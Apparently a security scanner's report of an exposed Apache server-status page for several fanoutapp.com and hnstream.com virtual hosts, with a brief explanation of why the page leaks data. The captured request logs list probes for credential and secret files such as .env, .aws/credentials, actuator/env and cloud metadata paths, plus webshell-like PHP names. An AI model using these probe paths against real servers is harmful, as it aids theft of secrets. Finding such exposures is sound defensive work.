0.00418219313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 0.00418219312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00418219612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00418219418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00418219616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418219315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00418219714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418219722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00418219312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00418219416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0041821908020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0041821937450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00418219319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00418219314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00418219512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00418219318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00418219720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00418219313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00418219411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00418219415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00418219310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0041821939730.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /.en
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf321a7713
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 29-Jan-2025 20:10:34 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 18 days 21 hours 31 minutes 37 seconds Server load: 0.13 0.23 0.22 Total accesses: 18087 - Total Traffic: 51.0 MB - Total Duration: 197824 CPU Usage: u27.24 s47.13 cu350.3 cs135.05 - .0343% CPU load .0111 requests/sec - 32 B/second - 2956 B/request - 10.9374 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01654066no2yes025020 21654067no2yes124020 Sum204 149040 _________________________.........................___W__________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1916540660/15/291_ 0.600247210.00.060.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/15/301_ 0.600337800.00.021.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/17/295_ 0.610337630.00.040.92 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/15/324_ 0.580336330.00.040.74 127.0.0.1http/1.1 0-1916540660/15/277_ 0.610534240.00.030.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1916540660/14/313_ 0.600542780.00.020.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1916540660/15/309_ 0.600228630.00.030.96 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/315_ 0.610229640.00.030.77 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 0-1916540660/17/293_ 0.610441810.00.041.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/16/319_ 0.590337120.00.040.74 127.0.0.1http/1.1 0-1916540660/14/281_ 0.610421610.00.030.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/17/310_ 0.600639320.00.130.80 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-1916540660/17/292_ 0.600435120.00.040.60 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/16/315_ 0.600737060.00.040.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-1916540660/19/302_ 0.6101039320.00.040.92 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/303_ 0.610838660.00.060.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/14/296_ 0.590448350.00.030.68 127.0.0.1http/1.1 0-1916540660/14/293_ 0.580923940.00.040.79 127.0.0.1http/1.1 0-1916540660/15/312_ 0.600630680.00.041.00 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/13/301_ 0.580233650.00.100.63 127.0.0.1http/1.1 0-1916540660/14/307_ 0.600436370.00.060.75 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/14/311_ 0.600230900.00.020.74 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/290_ 0.610332320.00.110.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/15/317_ 0.600430090.00.120.87 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/12/303_ 0.590432310.00.031.04 127.0.0.1http/1.1 1-14-0/0/167. 0.00418215614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00418215323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 0.00418215313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 0.00418215312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00418215612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00418215418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00418215616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418215315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00418215714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418215722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00418215312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00418215416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0041821508020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0041821537450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00418215319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00418215314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00418215512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00418215318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00418215720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00418215313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00418215411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00418215415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00418215310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0041821539730.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.old HTTP/1.1 1-14-0/0/164. 0.0041821539720.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 2-1916540670/22/278_ 0.77
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfa0e0b90c
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 29-Jan-2025 20:10:36 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 18 days 21 hours 31 minutes 39 seconds Server load: 0.13 0.23 0.22 Total accesses: 18189 - Total Traffic: 51.3 MB - Total Duration: 198254 CPU Usage: u27.3 s47.14 cu350.3 cs135.05 - .0343% CPU load .0111 requests/sec - 32 B/second - 2956 B/request - 10.8997 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01654066no2yes025020 21654067no2yes124020 Sum204 149040 _________________________.........................______________ W__________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1916540660/16/292_ 0.621447250.00.070.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/17/303_ 0.620237850.00.031.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /login.action HTTP/1.1 0-1916540660/18/296_ 0.620237660.00.040.92 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /login.action HTTP/1.1 0-1916540660/16/325_ 0.621336360.00.040.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/16/278_ 0.620334280.00.040.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-1916540660/16/315_ 0.620342850.00.030.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/17/311_ 0.620228680.00.030.96 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/17/316_ 0.620329680.00.040.78 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/18/294_ 0.620241840.00.041.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/17/320_ 0.620337160.00.050.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/15/282_ 0.620121630.00.040.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/18/311_ 0.621339360.00.130.81 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/18/293_ 0.611335160.00.050.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-1916540660/18/317_ 0.620237110.00.040.92 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/20/303_ 0.620339360.00.040.93 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/17/304_ 0.620438710.00.060.82 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/15/297_ 0.620448400.00.030.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/16/295_ 0.620123990.00.040.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/16/313_ 0.621330720.00.051.00 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/14/302_ 0.611333690.00.100.64 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/16/309_ 0.630236440.00.060.76 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-1916540660/15/312_ 0.611530950.00.020.74 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-1916540660/17/291_ 0.620232350.00.110.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server-status HTTP/1.1 0-1916540660/15/317_ 0.601430090.00.120.87 127.0.0.1http/1.1 0-1916540660/12/303_ 0.590432310.00.031.04 127.0.0.1http/1.1 1-14-0/0/167. 0.00418217614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00418217323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 0.00418217313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 0.00418217312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00418217612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00418217418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00418217616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418217315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00418217714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418217722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00418217312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00418217416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0041821708020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0041821737450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00418217319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00418217314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00418217512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00418217318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00418217720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00418217313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00418217411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00418217415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00418217310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0041821739730.00.000.41 127.0
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabff4ecfd7e
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 09-Jan-2026 18:51:41 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 50 Parent Server MPM Generation: 49 Server uptime: 48 days 20 hours 57 minutes 5 seconds Server load: 0.16 0.17 0.17 Total accesses: 114438 - Total Traffic: 316.9 MB - Total Duration: 959743 CPU Usage: u84.84 s127.81 cu1359.49 cs401.74 - .0467% CPU load .0271 requests/sec - 78 B/second - 2903 B/request - 8.38658 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02178401no0yes025000 22178400no1yes124000 Sum201 149000 _________________________.........................___________W__ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4921784010/41/1441_ 1.1292320182750.00.084.09 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4921784010/28/1382_ 1.089183114050.00.064.20 23.235.43.48http/1.1api.hnstream.com:8000GET /wp-miiss.php.php HTTP/1.1 0-4921784010/34/1430_ 1.1385083137820.00.143.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-4921784010/35/1403_ 1.1384914116940.00.084.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /local/.env HTTP/1.1 0-4921784010/36/1434_ 1.138486125080.00.154.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /admin/.env HTTP/1.1 0-4921784010/42/1416_ 1.138464101740.00.124.29 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /dev/.env HTTP/1.1 0-4921784010/33/1425_ 1.1184134105430.00.104.57 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4921784010/38/1441_ 1.1120663117940.00.094.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info HTTP/1.1 0-4921784010/37/1432_ 1.1352210126760.00.084.92 157.52.109.28http/1.1api.livecounter.org:8000GET /counters/keuzehulp-tool-usage/ HTTP/1.1 0-4921784010/36/1435_ 1.134922104140.00.074.27 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-4921784010/31/1428_ 1.115174117450.00.074.86 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /test.php HTTP/1.1 0-4921784010/39/1445_ 1.114874155440.00.094.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-admin/phpinfo.php HTTP/1.1 0-4921784010/31/1417_ 1.12206317107300.00.074.04 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /appsettings.json HTTP/1.1 0-4921784010/34/1399_ 1.1120663112960.00.083.93 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.aws/credentials HTTP/1.1 0-4921784010/41/1439_ 1.1220643144230.00.094.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /credentials.json HTTP/1.1 0-4921784010/31/1408_ 1.1120643110330.00.074.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /secrets.json HTTP/1.1 0-4921784010/40/1428_ 1.1220633117100.00.084.49 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /application.yml HTTP/1.1 0-4921784010/35/1430_ 1.1220613127440.00.083.98 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-config.php.bak HTTP/1.1 0-4921784010/40/1424_ 1.1220573134450.00.094.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.js HTTP/1.1 0-4921784010/34/1405_ 1.1220523127420.00.073.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/HEAD HTTP/1.1 0-4921784010/35/1411_ 1.0920433123210.00.074.10 23.235.43.38http/1.1api.hnstream.com:8000GET /f35.php HTTP/1.1 0-4921784010/37/1427_ 1.1220483127340.00.114.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.gitconfig HTTP/1.1 0-4921784010/26/1401_ 1.0820383127600.00.064.26 23.235.43.57http/1.1api.hnstream.com:8000GET /lddxs.php HTTP/1.1 0-4921784010/29/1388_ 1.0820331117880.00.074.16 23.235.43.23http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4921784010/41/1452_ 1.1220382130250.00.174.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-46-0/0/1489. 0.0024065612187180.00.004.13 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1473. 0.002406560132420.00.004.35 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1454. 0.002406569143750.00.003.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1504. 0.0024065612131870.00.004.39 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1449. 0.002406568139920.00.003.76 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1499. 0.0024065613143270.00.004.36 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1502. 0.002406562117340.00.004.46 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1480. 0.0024065612106800.00.004.00 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1476. 0.0024065612134150.00.004.32 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1469. 0.0024065612108670.00.003.96 157.52.117.24http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1493. 0.002406561130600.00.004.23 157.52.117.50http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1450. 0.002406565114550.00.003.83 167.82.233.138http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-46-0/0/1448. 0.0024065615106300.00.004.02 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1459. 0.0024065611126570.00.004.59 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=364 HTTP/1.1 1-46-0/0/1476. 0.002406569133750.00.004.04 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1458. 0.0024065615125140.00.004.28 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1480. 0.002406568110880.00.004.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1462. 0.0024065617128940.00.004.29 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1453. 0.002406568104680.00.004.39 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1495. 0.0024065612124260.00.004.35 198.235.24.201http/1.1 1-46-0/0/1468. 0.002406569123600.00.004.02 198.235.24.201http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1470. 0.0024065614113090.00.003.96 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1453. 0.0024065610112810.00.004.07 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1490. 0.002406568110970.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf57913950
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 02-Jan-2026 19:23:24 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 43 Parent Server MPM Generation: 42 Server uptime: 41 days 21 hours 28 minutes 49 seconds Server load: 0.16 0.19 0.18 Total accesses: 95776 - Total Traffic: 265.1 MB - Total Duration: 842968 CPU Usage: u73.07 s109.94 cu1160.72 cs343.56 - .0466% CPU load .0265 requests/sec - 76 B/second - 2902 B/request - 8.80145 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 31553263no1yes124010 41553264no0yes025000 Sum201 149010 ................................................................ ...........________________W_________________________________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-36-0/0/1163. 0.00505212522156340.00.003.30 127.0.0.1http/1.1api.hnstream.com:8000GET /service-account.json HTTP/1.1 0-36-0/0/1121. 0.00505212431101380.00.003.55 127.0.0.1http/1.1api.hnstream.com:8000GET /config/environment.json HTTP/1.1 0-36-0/0/1144. 0.00505212419119640.00.002.80 127.0.0.1http/1.1api.hnstream.com:8000GET /tsconfig.json HTTP/1.1 0-36-0/0/1125. 0.00505212302101120.00.003.17 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.postmark HTTP/1.1 0-36-0/0/1142. 0.00505212458107040.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /config/prod.json HTTP/1.1 0-36-0/0/1122. 0.0050521230485930.00.003.42 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/dynamic/instance-identity/document HTTP/1.1 0-36-0/0/1157. 0.0050521219389010.00.003.52 127.0.0.1http/1.1api.hnstream.com:8000GET /crm/.env HTTP/1.1 0-36-0/0/1155. 0.0050521228499470.00.003.37 